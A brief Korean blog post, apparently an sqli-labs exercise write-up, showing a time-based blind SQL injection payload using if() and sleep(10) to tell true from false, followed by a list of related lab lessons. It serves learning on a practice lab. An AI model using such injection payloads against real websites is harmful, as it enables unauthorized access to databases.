?id=1" and if(1=1, sleep(10), null) --%20
sleep(10)을 넣어서 True/False를 구분한다.
if ( 조건문, 참일때 값, 거짓일때 값)
'웹 해킹 > sqli-labs-master' 카테고리의 다른 글
| Less8-GET-Blind-Boolean Based-Single Quotes (0) | 2019.03.04 |
|---|---|
| Less7-GET-Dump into outfile-String (0) | 2019.03.04 |
| Less6-GET-Double Injection-Double Quotes-String (0) | 2019.03.04 |
| Less-5-GET-Double Injection-Single Quotes-String (0) | 2019.03.04 |
| Less4-GET-Error based-Double Quotes-String (0) | 2019.03.04 |